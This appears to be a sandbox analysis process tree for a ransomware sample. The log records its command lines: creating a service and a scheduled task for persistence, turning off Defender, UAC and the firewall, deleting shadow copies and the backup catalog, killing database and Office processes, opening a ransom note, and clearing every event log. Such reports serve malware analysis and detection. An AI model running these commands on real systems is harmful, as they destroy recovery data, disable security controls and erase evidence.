        C:\Windows\SysWOW64\sc.exe
        
        sc create SqlBakup binPath= "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto
        7⤵
        Launches sc.exe
        
        PID:7628
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start= auto
        6⤵
        
        PID:7644
        
        C:\Windows\SysWOW64\sc.exe
        
        sc create SqlBakup binPath= "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start= auto
        7⤵
        Launches sc.exe
        
        PID:7652
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Documents and Settings\Admin\Start Menu\Programs\Startup\Xinfecter.exe" start= auto
        6⤵
        
        PID:7664
        
        C:\Windows\SysWOW64\sc.exe
        
        sc create SqlBakup binPath= "C:\Documents and Settings\Admin\Start Menu\Programs\Startup\Xinfecter.exe" start= auto
        7⤵
        Launches sc.exe
        
        PID:7724
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ver
        6⤵
        
        PID:7708
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cd "%SystemDrive%\Users\%username%\AppData\"&S-2153.bat
        6⤵
        
        PID:7704
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\S-8459.vbs"
        7⤵
        
        PID:7832
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /C echo C:\Users\Admin\AppData\S-6748.bat
        8⤵
        
        PID:7804
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\S-6748.bat" "
        8⤵
        
        PID:7992
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist /v
        9⤵
        Enumerates processes with tasklist
        Suspicious behavior: EnumeratesProcesses
        
        PID:7928
        
        C:\Windows\SysWOW64\find.exe
        
        find /I /c "dcdcf"
        9⤵
        
        PID:7972
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\%username%\AppData\S-2153.bat'" /f
        6⤵
        
        PID:7856
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\Admin\AppData\S-2153.bat'" /f
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:7892
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c reg.exe add "HKLMSoftwarePoliciesMicrosoftWindows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f&reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic shadowcopy delete&netsh advfirewall set currentprofile state off&netsh firewall set opmode mode=disable&netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes&wbadmin delete catalog -quiet
        6⤵
        
        PID:7888
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKLMSoftwarePoliciesMicrosoftWindows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
        7⤵
        
        PID:7908
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        7⤵
        UAC bypass
        Modifies registry key
        
        PID:7944
        
        C:\Windows\SysWOW64\vssadmin.exe
        
        vssadmin.exe Delete Shadows /All /Quiet
        7⤵
        Interacts with shadow copies
        
        PID:7976
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic shadowcopy delete
        7⤵
        
        PID:8416
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall set currentprofile state off
        7⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:8596
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall set opmode mode=disable
        7⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:8660
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes
        7⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:8532
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /im msftesql.exe&taskkill /im sqlagent.exe&taskkill /im sqlbrowser.exe&taskkill /im sqlservr.exe&taskkill /im sqlwriter.exe&taskkill /im oracle.exe&taskkill /im ocssd.exe&taskkill /im dbsnmp.exe&taskkill /im synctime.exe&taskkill /im agntsvc.exe&taskkill /im mydesktopqos.exe&taskkill /im isqlplussvc.exe&taskkill /im xfssvccon.exe&taskkill /im mydesktopservice.exe&taskkill /im ocautoupds.exe&taskkill /im agntsvc.exe&taskkill /im encsvc.exe&taskkill /im firefoxconfig.exe&taskkill /im tbirdconfig.exe&taskkill /im ocomm.exe&taskkill /im mysqld.exe&taskkill /im mysqld-nt.exe&taskkill /im mysqld-opt.exe&taskkill /im dbeng50.exe&taskkill /im sqbcoreservice.exe&taskkill /im excel.exe&taskkill /im infopath.exe&taskkill /im msaccess.exe&taskkill /im mspub.exe&taskkill /im onenote.exe&taskkill /im outlook.exe&taskkill /im powerpnt.exe&taskkill /im steam.exe&taskkill /im thebat.exe&taskkill /im thebat64.exe&taskkill /im thunderbird.exe&taskkill /im visio.exe&taskkill /im winword.exe&taskkill /im wordpad.exe
        6⤵
        
        PID:8408
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im msftesql.exe
        7⤵
        Kills process with taskkill
        
        PID:17188
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im sqlagent.exe
        7⤵
        Kills process with taskkill
        
        PID:8696
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im sqlbrowser.exe
        7⤵
        Kills process with taskkill
        
        PID:8744
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im sqlservr.exe
        7⤵
        Kills process with taskkill
        
        PID:8884
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im sqlwriter.exe
        7⤵
        Kills process with taskkill
        
        PID:8036
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im oracle.exe
        7⤵
        Kills process with taskkill
        
        PID:8068
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im ocssd.exe
        7⤵
        Kills process with taskkill
        
        PID:8092
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im dbsnmp.exe
        7⤵
        Kills process with taskkill
        
        PID:8132
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im synctime.exe
        7⤵
        Kills process with taskkill
        
        PID:8168
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im agntsvc.exe
        7⤵
        
        PID:8212
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im mydesktopqos.exe
        7⤵
        Kills process with taskkill
        
        PID:10456
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im isqlplussvc.exe
        7⤵
        Kills process with taskkill
        
        PID:10708
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im xfssvccon.exe
        7⤵
        Kills process with taskkill
        
        PID:10668
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im mydesktopservice.exe
        7⤵
        
        PID:10936
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im ocautoupds.exe
        7⤵
        
        PID:8144
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im agntsvc.exe
        7⤵
        
        PID:8384
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im encsvc.exe
        7⤵
        Kills process with taskkill
        
        PID:5084
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im firefoxconfig.exe
        7⤵
        Kills process with taskkill
        
        PID:8324
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im tbirdconfig.exe
        7⤵
        Kills process with taskkill
        
        PID:8296
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im ocomm.exe
        7⤵
        
        PID:8228
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im mysqld.exe
        7⤵
        Kills process with taskkill
        
        PID:10912
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im mysqld-nt.exe
        7⤵
        
        PID:10828
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im mysqld-opt.exe
        7⤵
        Kills process with taskkill
        
        PID:10468
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im dbeng50.exe
        7⤵
        Kills process with taskkill
        
        PID:10632
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im sqbcoreservice.exe
        7⤵
        
        PID:8528
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im excel.exe
        7⤵
        Kills process with taskkill
        
        PID:8488
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im infopath.exe
        7⤵
        Kills process with taskkill
        
        PID:8440
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im msaccess.exe
        7⤵
        
        PID:8412
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im mspub.exe
        7⤵
        Kills process with taskkill
        
        PID:8404
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im onenote.exe
        7⤵
        
        PID:11036
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im outlook.exe
        7⤵
        Kills process with taskkill
        
        PID:11064
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im powerpnt.exe
        7⤵
        Kills process with taskkill
        
        PID:8944
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im steam.exe
        7⤵
        Kills process with taskkill
        
        PID:8860
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im thebat.exe
        7⤵
        
        PID:8836
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im thebat64.exe
        7⤵
        Kills process with taskkill
        
        PID:8816
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im thunderbird.exe
        7⤵
        Kills process with taskkill
        
        PID:8784
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im visio.exe
        7⤵
        
        PID:8964
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im winword.exe
        7⤵
        Kills process with taskkill
        
        PID:9012
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im wordpad.exe
        7⤵
        Kills process with taskkill
        
        PID:9028
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /im mshta.exe /f
        6⤵
        
        PID:10192
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im mshta.exe /f
        7⤵
        Kills process with taskkill
        
        PID:8084
      - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Documents and Settings\Admin\Desktop\ReadMe.hta"
        6⤵
        Modifies Internet Explorer settings
        
        PID:9980
      - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\ReadMe.hta"
        6⤵
        Modifies Internet Explorer settings
        
        PID:10444
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"
        6⤵
        
        PID:10608
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wevtutil.exe el
        7⤵
        
        PID:10784
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe el
        8⤵
        
        PID:10692
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Analytic"
        7⤵
        
        PID:10780
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Application"
        7⤵
        
        PID:10420
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "DebugChannel"
        7⤵
        
        PID:10804
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "DirectShowFilterGraph"
        7⤵
        
        PID:10816
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "DirectShowPluginControl"
        7⤵
        
        PID:10848
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Els_Hyphenation/Analytic"
        7⤵
        
        PID:10860
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "EndpointMapper"
        7⤵
        
        PID:10876
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "ForwardedEvents"
        7⤵
        
        PID:10880
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "HardwareEvents"
        7⤵
        
        PID:10956
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Internet Explorer"
        7⤵
        
        PID:10960
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Key Management Service"
        7⤵
        
        PID:10944
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "MF_MediaFoundationDeviceProxy"
        7⤵
        
        PID:10984
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Media Center"
        7⤵
        
        PID:16148
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "MediaFoundationDeviceProxy"
        7⤵
        
        PID:11024
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "MediaFoundationPerformance"
        7⤵
        
        PID:11072
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "MediaFoundationPipeline"
        7⤵
        
        PID:11032
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "MediaFoundationPlatform"
        7⤵
        
        PID:16156
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-IE/Diagnostic"
        7⤵
        
        PID:11088
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-IEDVTOOL/Diagnostic"
        7⤵
        
        PID:11096
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-IEFRAME/Diagnostic"
        7⤵
        
        PID:11120
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-JSDumpHeap/Diagnostic"
        7⤵
        
        PID:11140
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-PerfTrack-IEFRAME/Diagnostic"
        7⤵
        
        PID:11136
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-PerfTrack-MSHTML/Diagnostic"
        7⤵
        
        PID:11152
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-ADSI/Debug"
        7⤵
        
        PID:11164
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-API-Tracing/Operational"
        7⤵
        
        PID:11172
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-ATAPort/General"
        7⤵
        
        PID:11200
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-ATAPort/SATA-LPM"
        7⤵
        
        PID:11204
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-ActionQueue/Analytic"
        7⤵
        
        PID:11220
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AltTab/Diagnostic"
        7⤵
        
        PID:11232
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AppID/Operational"
        7⤵
        
        PID:11252
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AppLocker/EXE and DLL"
        7⤵
        
        PID:11248
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AppLocker/MSI and Script"
        7⤵
        
        PID:11224
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Admin"
        7⤵
        
        PID:11276
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Analytic"
        7⤵
        
        PID:11292
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Debug"
        7⤵
        
        PID:11304
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Operational"
        7⤵
        
        PID:11296
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Application-Experience/Problem-Steps-Recorder"
        7⤵
        Clears Windows event logs
        
        PID:11328
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant"
        7⤵
        
        PID:11336
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Troubleshooter"
        7⤵
        
        PID:11332
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Inventory"
        7⤵
        
        PID:11360
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Inventory/Debug"
        7⤵
        
        PID:11376
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Telemetry"
        7⤵
        
        PID:11352
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Audio/CaptureMonitor"
        7⤵
        
        PID:11408
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Audio/Operational"
        7⤵
        Clears Windows event logs
        
        PID:11416
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Audio/Performance"
        7⤵
        
        PID:11436
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Audit/Analytic"
        7⤵
        
        PID:11460
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Authentication User Interface/Operational"
        7⤵
        
        PID:11464
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AxInstallService/Log"
        7⤵
        Clears Windows event logs
        
        PID:11404
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Backup"
        7⤵
        
        PID:11484
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Biometrics/Operational"
        7⤵
        
        PID:11504
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-BitLocker-DrivePreparationTool/Admin"
        7⤵
        
        PID:10812
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-BitLocker-DrivePreparationTool/Operational"
        7⤵
        
        PID:9132
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Bits-Client/Analytic"
        7⤵
        
        PID:11060
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Bits-Client/Operational"
        7⤵
        
        PID:11544
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Bluetooth-MTPEnum/Operational"
        7⤵
        
        PID:5260
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-BranchCache/Operational"
        7⤵
        
        PID:5392
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-BranchCacheClientEventProvider/Diagnostic"
        7⤵
        
        PID:5892
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-BranchCacheEventProvider/Diagnostic"
        7⤵
        
        PID:6696
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Analytic"
        7⤵
        
        PID:3152
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Operational"
        7⤵
        
        PID:11560
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-CAPI2/Operational"
        7⤵
        
        PID:11676
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-CDROM/Operational"
        7⤵
        
        PID:11624
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-COM/Analytic"
        7⤵
        
        PID:11668
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-COMRuntime/Tracing"
        7⤵
        Clears Windows event logs
        
        PID:11684
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Calculator/Debug"
        7⤵
        
        PID:11704
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Calculator/Diagnostic"
        7⤵
        
        PID:11716
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-CertPoleEng/Operational"
        7⤵
        
        PID:11680
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-CertificateServicesClient-CredentialRoaming/Operational"
        7⤵
        
        PID:11760
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-ClearTypeTextTuner/Diagnostic"
        7⤵
        
        PID:11772
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-CmiSetup/Analytic"
        7⤵
        Clears Windows event logs
        
        PID:11784
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Operational"
        7⤵
        
        PID:11708
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Verbose"
        7⤵
        
        PID:16200
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-ComDlg32/Analytic"
        7⤵
        
        PID:11828
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-ComDlg32/Debug"
        7⤵
        
        PID:11812
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Client/Operational"
        7⤵
        
        PID:11748
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Server/Operational"
        7⤵
        
        PID:11924
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-CredUI/Diagnostic"
        7⤵
        Clears Windows event logs
        
        PID:11496
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Crypto-RNG/Analytic"
        7⤵
        
        PID:11936
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-D3D10Level9/Analytic"
        7⤵
        
        PID:11908
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-D3D10Level9/PerfTiming"
        7⤵
        
        PID:11724
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DCLocator/Debug"
        7⤵
        
        PID:11836
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DNS-Client/Operational"
        7⤵
        
        PID:11792
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DUI/Diagnostic"
        7⤵
        
        PID:11768
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DUSER/Diagnostic"
        7⤵
        Clears Windows event logs
        
        PID:11868
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DXGI/Analytic"
        7⤵
        
        PID:11940
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DXGI/Logging"
        7⤵
        
        PID:11988
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DXP/Analytic"
        7⤵
        
        PID:11996
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Analytic"
        7⤵
        
        PID:11980
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Debug"
        7⤵
        
        PID:12024
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Operational"
        7⤵
        
        PID:12044
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Deplorch/Analytic"
        7⤵
        
        PID:12052
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DeviceSync/Analytic"
        7⤵
        
        PID:12080
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DeviceSync/Operational"
        7⤵
        
        PID:12096
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DeviceUx/Informational"
        7⤵
        
        PID:12132
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DeviceUx/Performance"
        7⤵
        
        PID:12144
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Dhcp-Client/Admin"
        7⤵
        
        PID:12164
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Dhcp-Client/Operational"
        7⤵
        
        PID:14592
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DhcpNap/Admin"
        7⤵
        
        PID:12076
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DhcpNap/Operational"
        7⤵
        
        PID:12064
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Dhcpv6-Client/Admin"
        7⤵
        
        PID:12028
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Dhcpv6-Client/Operational"
        7⤵
        
        PID:12000
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DiagCpl/Debug"
        7⤵
        
        PID:11952
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Analytic"
        7⤵
        
        PID:12168
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Debug"
        7⤵
        
        PID:12216
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Operational"
        7⤵
        
        PID:12188
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Diagnosis-MSDE/Debug"
        7⤵
        
        PID:12208
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Analytic"
        7⤵
        
        PID:12224
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Debug"
        7⤵
        
        PID:12236
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Operational"
        7⤵
        
        PID:12244
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Diagnosis-PLA/Debug"
        7⤵
        
        PID:12248
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Diagnosis-PLA/Operational"
        7⤵
        Clears Windows event logs
        
        PID:12272
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Diagnosis-Perfhost/Analytic"
        7⤵
        
        PID:12296
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scheduled/Operational"
        7⤵
        
        PID:12304
        
        C:\Windows\SysWOW64\wevtutil.exe
        
